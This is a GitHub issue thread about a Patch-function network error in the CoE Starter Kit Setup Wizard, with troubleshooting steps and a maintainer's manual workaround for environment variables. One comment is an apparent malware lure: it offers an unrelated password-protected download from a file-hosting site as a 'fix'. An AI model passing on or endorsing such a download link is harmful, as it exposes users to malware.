### ISSUE TITLE
[CoE Starter Kit - BUG] Network error when using Patch function: The requested operation is invalid.

### ISSUE THREAD

**Issue by HarithaE508** [microsoft/coe-starter-kit#8899]
### Does this bug already exist in our backlog?

- [X] I have checked and confirm this is a new bug.

### Describe the issue

While setting up the "Center of Excellence Setup Wizard" in 2nd step "Configure communication methods," after selecting groups for admin, makers, and user persona, I'm getting this error "Network error when using Patch function: The requested operation is invalid."

### Expected Behavior

It needs to select the groups.

### What solution are you experiencing the issue with?

Core

### What solution version are you using?

4.37

### What app or flow are you having the issue with?

CoE Setup and Upgrade Wizard app

### What method are you using to get inventory and telemetry?

None

### Steps To Reproduce

1. Go to PowerApps in the correct environment
2. Run "COE Setup Wizard (Preview)"
3. Configure the the steps 

### Anything else?

![coeissue](https://github.com/user-attachments/assets/8257b7dc-ee7f-4641-971b-33820db89454)
34)

**Comment by HarithaE508** [comment]
In 1st step, also I got this "Error loading control". When I click on this it opens again the same Power Apps application.
![isssue1](https://github.com/user-attachments/assets/ba08d0d2-ee4b-45e2-a649-edf2ea6881c0)

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by TammoJ-S** [comment]
Same here. Started a new env and imported the CoE - Core v4.32.2 but did not receive the Error loading control on the 1st step. I did however receive this error last friday with v4.37 and continuing with that version also resulted in "Network error when using Patch function: The requested operation is invalid." on step 2.

**Comment by Jenefer-Monroe** [comment]
## Setup Wizard broken First Screen

That **_Error loading control_** usually means that the following flows which are supposed to be on when you install / upgrade are not on:
- SetupWizard>CreateGroup
- SetupWizard>GetCurrentEnvironment
- SetupWizard>GetTenantID
- SetupWizard>GetUserDetails

And that typically means that the **_HTTP with Microsoft Entra ID (preauthorized)_** connection was not configured correctly. 
Sometimes the product will setup one of these with the wrong URL
Please find this connector and validate its pointing to the graph URL for your tenant.
![image](https://github.com/microsoft/coe-starter-kit/assets/89584709/d17f395e-d935-4e76-b62f-e6ce444897af)
![image](https://github.com/microsoft/coe-starter-kit/assets/89584709/13cbb030-aa19-4e73-bf2b-cc4b0b692418)

**Comment by HarithaE508** [comment]
Hello @Jenefer-Monroe, Thank you for responding. I set up those connections still facing the same errors.
![solved1](https://github.com/user-attachments/assets/419d3b8f-db09-4a12-906e-c29f77aa47a9)
after giving connection I refreshed the Power Apps again, i re-opend the "Center of Excellence Setup Wizard".  Same error I'm getting.
![solved2](https://github.com/user-attachments/assets/629808d6-582b-4f11-8d19-62c917196214)

**Comment by HarithaE508** [comment]
1 more doubt, where i can find these flows 
SetupWizard>CreateGroup
SetupWizard>GetCurrentEnvironment
SetupWizard>GetTenantID
SetupWizard>GetUserDetails
in the solution.

**Comment by TammoJ-S** [comment]
From my side, all these flows are turned on and the HTTP connector is configured correctly. Still i get the "Network error when using Patch function: The requested operation is invalid." error at step 2 configuring communication methods.

**Comment by HarithaE508** [comment]
Hello @TammoJ-S can you please tell me where to turn on those flows.

**Comment by TammoJ-S** [comment]
Hi @HarithaE508, you can find the flows from PowerApps, Solutions, Open the Center of Excellence - Core Components, then in the left column choose Cloud Flows, and then from the search box (top right) use the word SetupWizard to narrow down the amount of flows. You should be able to see the 4 flows and their status (must be turned on).

**Comment by HarithaE508** [comment]
Thank you, @TammoJ-S. I found those flows, and their status is On only. But still facing this "Error Loading Control" and "Network issues."

**Comment by Jenefer-Monroe** [comment]
Sorry these appear to be separate issues. 

Error loading control is an issue with the Creator Kit control we use there. And if the flow is returning successfully then I'm afraid the issue is with the control. 
Please post a separate issue for it as we cannot manage two issues here.

**Comment by TammoJ-S** [comment]
So do we keep this incident for "Network error when using Patch function: The requested operation is invalid." ?

**Comment by Jenefer-Monroe** [comment]
Yes let's use this issue to track the original issue about updating groups. 
For the group, I've seen this happen for a few people, and have not been able to deduce what is happening. It must be some permissions issue but Im not sure. Good news is that its easy to work around by just filling them manually.

### How to update env vars manualy
You can manually update environment variables by doing the following: 
1. Browse to the default solution > environment variables 
2. Find the env var you wish to update and edit
3. Add a new current value (do not update default as it is overwritten on upgrade)
![image](https://github.com/microsoft/coe-starter-kit/assets/89584709/027b6a7c-b105-4fdc-90fb-005c8e2ed71b)

### For these env vars in particular:
**Admin eMail** : 
Required
The email address of the admin group you want to use for communications. 
Ex: PowerPlatformAdmins@myCompany.onmicrosoft.com

**Power Platform Maker Group ID** : 
Required
The group ID of the maker group you want all your Power Platform makers to be a part of (for communication and app sharing)
Ex: a11aa111-a1a1-a1a1-a1a1-abc123abc123

**Power Platform User Group ID** : 
Optional
The group ID of the user group you want all your Power Platform users to be a part of (for communication and app sharing)
Ex: a11aa111-a1a1-a1a1-a1a1-abc123abc123

**Comment by TammoJ-S** [comment]
Hi Jenefer,

I finished the setup wizard and did see one or two intermittent "Network error when using Patch function" messages, but i could continue. I could turn on all the necessary dataflows and scheduled the CoE BYODL Makers to run once every night. All dataflows have refreshed during configuration.
![image](https://github.com/user-attachments/assets/75167e88-1b10-4bb3-8b3d-98e75d8d94ed)


However, looking at the DataFlows today, they've all status Off. And the Last modified time is 20 to 22 hours ago which is the moment of configuring these dataflows yesterday. So, they didn't update during the night, although the CoE BYODL Makers showed the correct update time (5.00 AM).
<img width="1009" alt="image" src="https://github.com/user-attachments/assets/75279df5-0b18-4964-9240-f59f6b060392">


How can i solve this and turn these dataflows on?

**Comment by Jenefer-Monroe** [comment]
Hello. We need to keep issues to single issue so plesae post your query about dataflows in another issue. I'll hide to avoid confusion.

**Comment by Jenefer-Monroe** [comment]
Someone posted the bug and it appears the product behavior for env vars is chanigng. 
I do repro in preview as well. 

It looks like in the past you could basically **_upsert_** env vars. In others add or update and the product would know which to do
![image](https://github.com/user-attachments/assets/ecc139c1-d6c2-41ae-923e-7d043a23ee49)

But now you need to update or insert
![image](https://github.com/user-attachments/assets/947095ed-4b25-4877-bdd7-6d699c002ebe)

**Comment by Jenefer-Monroe** [comment]
fixing this with https://github.com/microsoft/coe-starter-kit/issues/8916 for sept release. 
I'll go ahead and close this one out as a result, please track with https://github.com/microsoft/coe-starter-kit/issues/8916
